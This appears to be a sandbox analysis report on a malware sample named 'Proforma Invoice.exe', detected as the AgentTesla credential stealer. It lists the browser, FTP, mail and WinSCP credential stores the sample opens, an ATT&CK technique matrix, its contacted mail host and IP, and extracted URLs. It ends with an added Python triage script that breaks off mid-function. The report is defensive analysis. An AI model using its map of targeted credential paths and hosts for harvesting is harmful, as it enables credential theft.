                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 0.2.Proforma Invoice.exe.3846860.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.3846860.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.374c7b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.36f5390.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 6844, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 6804, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Proforma Invoice.exe PID: 6804, type: MEMORYSTR

Remote Access Functionality:

                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3846860.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3846860.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.374c7b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.36f5390.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6844, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6804, type: MEMORYSTR

Mitre Att&ck Matrix

(Columns are ATT&CK tactics; digits after a technique name are the report's count badges for that technique, kept as extracted.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 12 | Masquerading 11 | OS Credential Dumping 2 | Security Software Discovery 211 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | Input Capture 21 | Process Discovery 2 | Remote Desktop Protocol | Input Capture 21 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 131 | Credentials in Registry 1 | Virtualization/Sandbox Evasion 131 | SMB/Windows Admin Shares | Archive Collected Data 11 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 12 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Data from Local System 2 | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | System Information Discovery 114 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

                      Behavior Graph

(The interactive behavior graph is not reproduced in this text export. Its legend distinguishes processes, signatures, created files, DNS/IP info, dropped files, Windows processes, counts of created registry values and files, the implementation language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other), malicious marking, and Internet nodes.)


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
Proforma Invoice.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
4.2.Proforma Invoice.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

Source | Detection | Scanner | Label
webmail.karanex.com | 1% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://rafeBU.com | 2% | Virustotal |
http://rafeBU.com | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://webmail.karanex.com | 1% | Virustotal |
http://webmail.karanex.com | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
https://api.ipify.org%$ | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://LqBkoD7aW7iu.org | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
webmail.karanex.com | 185.8.128.141 | true | true | - | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.apache.org/licenses/LICENSE-2.0 | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://DynDns.comDynDNS | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://rafeBU.com | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | Virustotal: 2%; Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.tiro.com | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://webmail.karanex.com | Proforma Invoice.exe, 00000004.00000002.562871223.000000000319E000.00000004.00000001.sdmp | false | Virustotal: 1%; Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.collada.org/2005/11/COLLADASchema9Done | Proforma Invoice.exe, 00000000.00000002.309881173.00000000025A1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org%$ | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.carterandcone.coml | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
https://api.ipify.org%GETMozilla/5.0 | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://LqBkoD7aW7iu.org | Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp; Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
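Most rows in this table are font-vendor and licence URLs from one read-write region of the original process (process 0, base 06692000) and are noise from embedded resources, not indicators. The strings worth keeping are those that sit in the regions where the AgentTesla Yara rules also matched (the three MEMORY sources listed under "Yara detected AgentTesla"), or whose host the sandbox actually saw contacted (webmail.karanex.com). As an added example that is not part of the report, the Python below scores each string by those two cross-references plus two weaker hints. It assumes a Joe Sandbox dump name reads `<process index>.<dump round>.<unique id>.<base address>.<page protection>.<type>.sdmp` and that the protection field is the Win32 page-protection value (0x40 = PAGE_EXECUTE_READWRITE); the report does not document that layout. The sample rows are copied in the report's shape and the weights are arbitrary choices made here.

```python
import re
from dataclasses import dataclass

# Constructed sample: (string, source) pairs in the shape of the report's
# "URLs from Memory and Binaries" rows. One string may carry several sources.
SAMPLE_STRINGS = [
    ("http://127.0.0.1:HTTP/1.1",
     "Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp"),
    ("http://www.fontbureau.com/designers",
     "Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp"),
    ("https://api.ipify.org%GETMozilla/5.0",
     "Proforma Invoice.exe, 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp"),
    ("http://webmail.karanex.com",
     "Proforma Invoice.exe, 00000004.00000002.562871223.000000000319E000.00000004.00000001.sdmp"),
    ("http://www.sakkal.com",
     "Proforma Invoice.exe, 00000000.00000002.312573125.0000000006692000.00000004.00000001.sdmp"),
    ("https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip",
     "Proforma Invoice.exe, 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, "
     "Proforma Invoice.exe, 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp"),
]

# Memory regions in which the report's Yara rules for the family matched
# (keyed by the first four dump-name fields).
YARA_REGIONS = {
    "00000004.00000002.560307423.0000000000402000",
    "00000000.00000002.310366268.00000000035A9000",
    "00000004.00000002.562365344.0000000002E31000",
}
# Hosts the sandbox recorded as actually contacted during the run.
CONTACTED_HOSTS = {"webmail.karanex.com"}

PAGE_EXECUTE_READWRITE = 0x40  # Win32 page protection; field meaning is an assumption here

# Assumed dump-name layout: pidx.round.uid.base.protection.type.sdmp
_DUMP_RE = re.compile(
    r"(?P<pidx>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass
class Region:
    process_index: int
    base: int
    protection: int
    key: str  # "<pidx>.<round>.<uid>.<base>", the form used in YARA_REGIONS


def parse_regions(source):
    """Extract every memory-dump reference from a row's Source column."""
    return [
        Region(
            process_index=int(m.group("pidx"), 16),
            base=int(m.group("base"), 16),
            protection=int(m.group("prot"), 16),
            key=".".join(m.group("pidx", "round", "uid", "base")),
        )
        for m in _DUMP_RE.finditer(source)
    ]


def host_of(url):
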